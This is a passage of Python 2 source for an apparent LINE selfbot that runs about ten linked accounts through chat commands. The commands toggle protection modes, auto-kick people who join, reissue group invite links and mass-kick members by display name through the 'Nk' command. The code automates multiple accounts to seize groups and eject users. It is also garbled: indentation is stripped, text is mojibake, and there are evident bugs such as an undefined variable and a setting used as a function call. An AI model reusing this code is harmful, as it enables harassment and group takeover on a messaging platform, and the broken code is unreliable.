ki2.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'kicker off':
if wait["joinkick"] == False:
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Kicker Auto set Off✍")
else:
ki2.sendText(msg.to,"Kicker Auto set Off✍")
else:
wait["joinkick"] = False
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Kicker Auto set Off✍")
else:
ki2.sendText(msg.to,"It is already Off ô€¨")
elif msg.text.lower() == 'autokick on':
if wait["AutoKick"] == True:
if wait["lang"] == "JP":
ki3.sendText(msg.to,"Auto Kick set On✍")
else:
ki3.sendText(msg.to,"Auto Kick set On✍")
else:
wait["AutoKick"] = True
if wait["lang"] == "JP":
ki3.sendText(msg.to,"Auto Kick set On✍")
else:
ki3.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'autokick off':
if wait["AutoKick"] == False:
if wait["lang"] == "JP":
ki3.sendText(msg.to,"Auto Kick set Off✍")
else:
ki3.sendText(msg.to,"Auto Kick set Off✍")
else:
wait["AutoKick"] = False
if wait["lang"] == "JP":
ki3.sendText(msg.to,"Auto Kick set Off✍")
else:
ki3.sendText(msg.to,"It is already Off ô€¨")
elif msg.text.lower() == 'blocklist':
blockedlist = ki.getBlockedContactIds()
ki.sendText(msg.to, "Please wait ✍")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Allprotect on","Mode on"]:
if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"All Protect on🔓✍")
ki2.sendText(msg.to,"All Protect on🔓✍")
ki3.sendText(msg.to,"All Protect on🔓✍")
ki4.sendText(msg.to,"All Protect on🔓✍")
ki5.sendText(msg.to,"All Protect on🔓✍")
ki6.sendText(msg.to,"All Protect on🔓✍")
ki7.sendText(msg.to,"All Protect on🔓✍")
ki8.sendText(msg.to,"All Protect on🔓✍")
ki9.sendText(msg.to,"All Protect on🔓✍")
ki10.sendText(msg.to,"All Protect on🔓✍")
else:
ki.sendText(msg.to,"")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"Invite Protect set On✍")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Cancel Protect set On✍")
else:
ki2.sendText(msg.to,"Cancel Protect set On✍")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Cancel Protect set On✍")
if wait["protect"] == True:
if wait["lang"] == "JP":
ki3.sendText(msg.to,"Protect set On✍")
else:
ki3.sendText(msg.to,"Protect set On✍")
else:
wait["protect"] = True
if wait["lang"] == "JP":
ki3.sendText(msg.to,"Protect set On✍")
else:
ki3.sendText(msg.to,"Protect set on✍")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
ki4.sendText(msg.to,"Link Protect set On✍")
else:
ki4.sendText(msg.to,"Link Protect set On✍")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
ki4.sendText(msg.to,"Link Protect set On✍")
else:
ki4.sendText(msg.to,"Link Protect set On✍")
if wait["joinkick"] == True:
if wait["lang"] == "JP":
ki5.sendText(msg.to,"Kicker Protect set On✍")
else:
ki5.sendText(msg.to,"Kicker Protect set On✍")
else:
wait["joinkick"] = True
if wait["lang"] == "JP":
ki5.sendText(msg.to,"Kicker Protect set On✍")
else:
ki5.sendText(msg.to,"Kicker Protect set On✍")
if wait["AutoKick"] == True:
if wait["lang"] == "JP":
ki6.sendText(msg.to,"Auto Kick set On✍")
else:
ki6.sendText(msg.to,"Auto Kick set On✍")
else:
wait["AutoKick"] = True
if wait["lang"] == "JP":
ki6.sendText(msg.to,"Auto Kick set On✍")
else:
ki6.sendText(msg.to,"Auto Kick set On✍")
elif msg.text in ["Allprotect off","Mode off"]:
if msg.from_ in admin:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"All Protect off🔓✍")
ki2.sendText(msg.to,"All Protect off🔓✍")
ki3.sendText(msg.to,"All Protect off🔓✍")
ki4.sendText(msg.to,"All Protect off🔓✍")
ki5.sendText(msg.to,"All Protect off🔓✍")
ki6.sendText(msg.to,"All Protect off🔓✍")
ki7.sendText(msg.to,"All Protect off🔓✍")
ki8.sendText(msg.to,"All Protect off🔓✍")
ki9.sendText(msg.to,"All Protect off🔓✍")
ki10.sendText(msg.to,"All Protect off🔓✍")
else:
ki.sendText(msg.to,"")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Invite Protect set Off✍")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Cancel Protect set Off✍")
else:
ki2.sendText(msg.to,"Cancel Protect set Off✍")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Cancel Protect set Off✍")
if wait["protect"] == False:
if wait["lang"] == "JP":
ki3.sendText(msg.to,"Protect set Off✍")
else:
ki3.sendText(msg.to,"Protect set Off✍")
else:
wait["protect"] = False
if wait["lang"] == "JP":
ki3.sendText(msg.to,"Protect set Off✍")
else:
ki3.sendText(msg.to,"Protect set Off✍")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
ki4.sendText(msg.to,"Link Protect set Off✍")
else:
ki4.sendText(msg.to,"Link Protect set Off✍")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
ki4.sendText(msg.to,"Link Protect set Off✍")
else:
ki4.sendText(msg.to,"Link Protect set Off✍")
if wait["joinkick"] == False:
if wait["lang"] == "JP":
ki5.sendText(msg.to,"Kicker Protect set Off✍")
else:
ki5.sendText(msg.to,"Kicker Protect set Off✍")
else:
wait["joinkick"] = False
if wait["lang"] == "JP":
ki5.sendText(msg.to,"Kicker Protect set Off✍")
else:
ki5.sendText(msg.to,"Kicker Protect set Off✍")
if wait["AutoKick"] == False:
if wait["lang"] == "JP":
ki5.sendText(msg.to,"Auto Kick set Off✍")
else:
ki5.sendText(msg.to,"Auto Kick set Off✍")
else:
wait["AutoKick"] = False
if wait["lang"] == "JP":
ki5.sendText(msg.to,"Auto Kick set Off✍")
else:
ki5.sendText(msg.to,"Auto Kick set Off✍")
elif msg.text.lower() == 'auto join off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Join set Off✍")
else:
ki.sendText(msg.to,"Auto Join set Off")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Join set Off✍")
else:
ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text.lower() == 'kicker off':
if wait["joinkick"] == False:
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Kicker Auto set Off✍")
else:
ki2.sendText(msg.to,"Kicker Auto set Off✍")
else:
wait["joinkick"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Kicker Auto set Off✍")
else:
ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Protect off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Protect off🔓✍")
ki2.sendText(msg.to,"Auto Protect off🔓✍")
ki3.sendText(msg.to,"Auto Protect off🔓✍")
ki4.sendText(msg.to,"Auto Protect off🔓✍")
ki5.sendText(msg.to,"Auto Protect off🔓✍")
ki6.sendText(msg.to,"Auto Protect off🔓✍")
ki7.sendText(msg.to,"Auto Protect off🔓✍")
ki8.sendText(msg.to,"Auto Protect off🔓✍")
ki9.sendText(msg.to,"Auto Protect off🔓✍")
ki10.sendText(msg.to,"Auto Protect off🔓✍")
else:
ki.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["protect"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Protect off🔓✍")
ki2.sendText(msg.to,"Auto Protect off🔓✍")
ki3.sendText(msg.to,"Auto Protect off🔓✍")
ki4.sendText(msg.to,"Auto Protect off🔓✍")
ki5.sendText(msg.to,"Auto Protect off🔓✍")
ki6.sendText(msg.to,"Auto Protect off🔓✍")
ki7.sendText(msg.to,"Auto Protect off🔓✍")
ki8.sendText(msg.to,"Auto Protect off🔓✍")
ki9.sendText(msg.to,"Auto Protect off🔓✍")
ki10.sendText(msg.to,"Auto Protect off🔓✍")
else:
ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Qrprotect off","qrprotect off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Qr protect off✍")
else:
ki.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Qr protect off✍")
else:
ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Invitepro off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Invite Protect Off🛡")
else:
ki.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Invite Protect Off🛡")
else:
ki.sendText(msg.to,"It is already open ô€œ👈")
elif msg.text in ["Cancelprotect off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Cancel Protect Off📌")
else:
ki.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Cancel Protect off✍")
else:
ki.sendText(msg.to,"It is already open ô€œ👈")
elif "Group cancel:" in msg.text:
try:
strnum = msg.text.replace("Group cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"ItuItu Off")
else:
ki.sendText(msg.to,"Off undangan ditolak👈Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis👈")
else:
cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nilai tidak benar👈")
else:
cl.sendText(msg.to,"Weird value🛡")
elif msg.text in ["Auto leave on","Auto leave: on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Leave on🛡")
else:
ki.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Leave On ✍")
else:
ki.sendText(msg.to,"Is already open👈")
elif msg.text in ["Auto leave off","Auto leave: off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Leave off🛡")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Leave Off ✍")
else:
cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Joincancel on","Joincancel:on"]:
if wait["AutoJoinCancel"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Join Cancel set on✍")
else:
ki.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Join Cancel set On✍")
else:
ki.sendText(msg.to,"Is already open👈")
elif msg.text in ["Joincancel off","Joincancel:off"]:
if wait["AutoJoinCancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Join Cancel set Off✍")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["AutoJoinCancel"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Join Cancel set Off ✍")
else:
cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Share on","share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Share on ✍ ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ready On👈")
else:
cl.sendText(msg.to,"Ready On👈")
elif msg.text in ["Share off","share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Share off ✍ ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ready Off👈")
else:
cl.sendText(msg.to,"Ready Off👈")
elif msg.text in ["Set"]:
md = ""
if wait["Sambutan"] == True: md+="╠🔐Sambutan : 📱On\n"
else:md+="╠🔐Sambutan : 📴Off\n"
if wait["likeOn"] == True: md+="╠🔐Auto Like : 📱On\n"
else:md+="╠🔐Auto Like : 📴Off\n"
if wait["timeline"] == True: md+="╠🔐Share : 📱On\n"
else:md+="╠🔐Share : 📴Off\n"
if wait["autoAdd"] == True: md+="╠🔐Auto Add : 📱On\n"
else:md+="╠🔐Auto Add : 📴Off\n"
if wait["autoJoin"] == True: md+="╠🔐Auto Join : 📱On\n"
else: md +="╠🔐Auto Join : 📴Off\n"
if wait["leaveRoom"] == True: md+="╠🔐Auto Leave : 📱On\n"
else:md+="╠🔐Auto Leave : 📴Off\n"
if wait["AutoJoinCancel"] == True: md+="╠🔐Auto Join Cancel : 📱On\n"
else: md +="╠🔐Auto Join Cancel : 📴Off\n"
if wait["contact"] == True: md+="╠🔐Info Contact : 📱On\n"
else: md+="╠🔐Info Contact : 📴Off\n"
if wait["cancelprotect"] == True:md+="╠🔐Auto Cancel : 📱On\n"
else: md+= "╠🔐Auto Cancel : 📴Off\n"
if wait["inviteprotect"] == True:md+="╠🔐Invite Protect : 📱On\n"
else: md+= "╠🔐Invite Protect : 📴Off\n"
if wait["protect"] == True: md+="╠🔐Protect Mode : 📱On\n"
else:md+="╠🔐Protect Mode : 📴Off\n"
if wait["linkprotect"] == True: md+="╠🔐Link Protect : 📱On\n"
else:md+="╠🔐Link Protect : 📴Off\n"
if wait["AutoKick"] == True: md+="╠🔐Auto Kick : 📱On\n"
else:md+="╠🔐Auto Kick : 📴Off\n"
if wait["joinkick"] == True: md+="╠🔐Kick Joiners : 📱On\n"
else:md+="╠🔐Kick Joiners : 📴Off\n"
if wait["alwaysRead"] == True: md+="╠🔐Always Read : 📱On\n"
else:md+="╠🔐Always Read: 📴Off\n"
if wait["detectMention"] == True: md+="╠🔐Auto Respon1 : 📱On\n"
else:md+="╠🔐Auto Respon1 : 📴Off\n"
if wait["detectMention2"] == True: md+="╠🔐Auto Respon2 : 📱On\n"
else:md+="╠🔐Auto Respon2 : 📴Off\n"
if wait["detectMention3"] == True: md+="╠🔐Auto Respon3 : 📱On\n"
else:md+="╠🔐Auto Respon3 : 📴Off\n"
if wait["detectMention4"] == True: md+="╠🔐Auto Respon4 : 📱On\n"
else:md+="╠🔐Auto Respon4 : 📴Off\n"
if wait["kickMention"] == True: md+="╠🔐Auto Respon Kick : 📱On\n"
else:md+="╠🔐Auto Respon Kick : 📴Off\n"
if wait["commentOn"] == True: md+="╠🔐Auto Comment : 📱On\n"
else:md+="╠🔐Auto Comment Kick : 📴Off\n"
if wait["sticker"] == True: md+="╠🔐Detect Sticker : 📱On\n"
else:md+="╠🔐Detect Sticker : 📴Off\n"
if wait["Sider"] == True: md+="╠🔐Detect Sider : 📱On\n"
else:md+="╠🔐Detect Sider : 📴Off\n"
if wait["Mimic"] == True: md+="╠🔐Mimic Mode : 📱On\n"
else:md+="╠🔐Mimic Mode : 📴Off\n"
if wait["Simi"] == True: md+="╠🔐Simisimi : 📱On\n"
else:md+="╠🔐Simisimi: 📴Off\n"
cl.sendText(msg.to,"╔════════════════════\n""║ ☆☞ Re̶y̶Pr̶o̶ Setting ☜☆\n""╠════════════════════\n"+md+"╚════════════════════")
eltime = time.time() - mulai
van = "Runtime :" +waktu(eltime)+"\nVersi Bot :2.6.4-ŠĒ『Python 2.7』"
cl.sendText(msg.to,van)
elif msg.text.lower() == 'me':
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
ki6.sendMessage(msg)
ki7.sendMessage(msg)
ki8.sendMessage(msg)
ki9.sendMessage(msg)
ki10.sendMessage(msg)
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
ki.sendText(msg.to," My Creator ")
ki2.sendMessage(msg)
ki2.sendText(msg.to," Dont Kick out From group ")
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"All invitations have been refused")
else:
ki.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif "Set album:" in msg.text:
gid = msg.text.replace("Set album:","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada album👈")
else:
cl.sendText(msg.to,"Dalam album tidak👈")
else:
if wait["lang"] == "JP":
mg = "Berikut ini adalah album dari target"
else:
mg = "Berikut ini adalah subjek dari album"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "æžš\n"
else:
mg += str(y["title"]) + ":0 Pieces\n"
cl.sendText(msg.to,mg)
elif "Album" in msg.text:
gid = msg.text.replace("Album","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada album")
else:
cl.sendText(msg.to,"Dalam album tidak")
else:
if wait["lang"] == "JP":
mg = "Berikut ini adalah album dari target"
else:
mg = "Berikut ini adalah subjek dari album"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "\n"
else:
mg += str(y["title"]) + ":0 pieces\n"
elif "Hapus album " in msg.text:
gid = msg.text.replace("Hapus album ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["gid"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Soal album telah dihapus")
else:
cl.sendText(msg.to,str(i) + "Hapus kesulitan album🛡")
elif msg.text.lower() == 'group id':
gid = ki.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
ki.sendText(msg.to,h)
elif 'Blank' in msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': "Reiyan,'"}
ki3.sendMessage(msg)
elif msg.text in ["Out"]:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
ki6.leaveGroup(i)
ki7.leaveGroup(i)
ki8.leaveGroup(i)
ki9.leaveGroup(i)
ki10.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Bot Sudah Keluar Di semua grup")
else:
ki.sendText(msg.to,"Declined all invitations")
elif "Album deleted:" in msg.text:
gid = msg.text.replace("Album deleted:","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Soal album telah dihapus👈")
else:
cl.sendText(msg.to,str(i) + "Hapus kesulitan album👈")
elif msg.text in ["Auto add on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Already On👈")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On👈")
else:
cl.sendText(msg.to,"Already On👈")
elif msg.text in ["Auto add off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off👈")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off👈")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
ki.sendText(msg.to,"We changed the message👈")
elif "Help set:" in msg.text:
wait["help"] = msg.text.replace("Help set:","")
ki2.sendText(msg.to,"We changed the Help👈")
elif "Pesan add-" in msg.text:
wait["message"] = msg.text.replace("Pesan add-","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kami mengubah pesan🛡")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message Confirmation"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis👈")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia👈")
elif "Message set" in msg.text:
c = msg.text.replace("Message set","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Come Set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
ki.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di👈")
else:
cl.sendText(msg.to,"To open👈")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"オンã«ã—ã¾ã—ãŸ👈")
else:
cl.sendText(msg.to,"è¦äº†å¼€👈")
elif msg.text in ["Come off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Come off")
else:
ki.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
ki.sendText(msg.to,"Off👈")
else:
ki.sendText(msg.to,"To turn off")
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
elif msg.text in ["url","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can't be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif "Rey gurl" in msg.text:
if msg.toType == 2:
group = ki.getGroup(msg.to)
group.preventJoinByTicket = False
ki.updateGroup(group)
if wait["lang"] == "JP":
ki.sendText(msg.to,"URL on ✍")
else:
if wait["lang"] == "JP":
ki2.sendText(msg.to,"It can not be used outside the group 👈")
else:
ki2.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif "Rey curl" in msg.text:
if msg.toType == 2:
group = ki.getGroup(msg.to)
group.preventJoinByTicket = True
ki.updateGroup(group)
if wait["lang"] == "JP":
ki.sendText(msg.to,"URL Closed ✍")
else:
if wait["lang"] == "JP":
ki2.sendText(msg.to,"It can not be used outside the group 👈")
else:
ki2.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
else:
cl.sendText(msg.to,"The following is a blacklistô€œ👈")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"👉Jam on👈")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Hal ini sudah off🛡")
else:
wait["clock"] = False
cl.sendText(msg.to,"Adalah Off")
elif "Jam say:" in msg.text:
n = msg.text.replace("Jam say:","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Ini telah diubah🛡\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui👈")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki3.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
elif msg.text == "Sider":
cl.sendText(msg.to, "hmm..")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['ROM'][msg.to] = {}
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
print wait2
elif msg.text == "Read":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "== Bakekok Sider == %s\nthat's it\n\nPeople who have ignored reads\n%skampret lo sider. ♪\n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "An already read point has not been set.\n「set」you can send ♪ read point will be created ♪")
#-----------------------[Add Staff Section]------------------------
elif "Add staff @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Add Staff @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff add executing"
_name = msg.text.replace("Add Staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove Staff @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove Staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
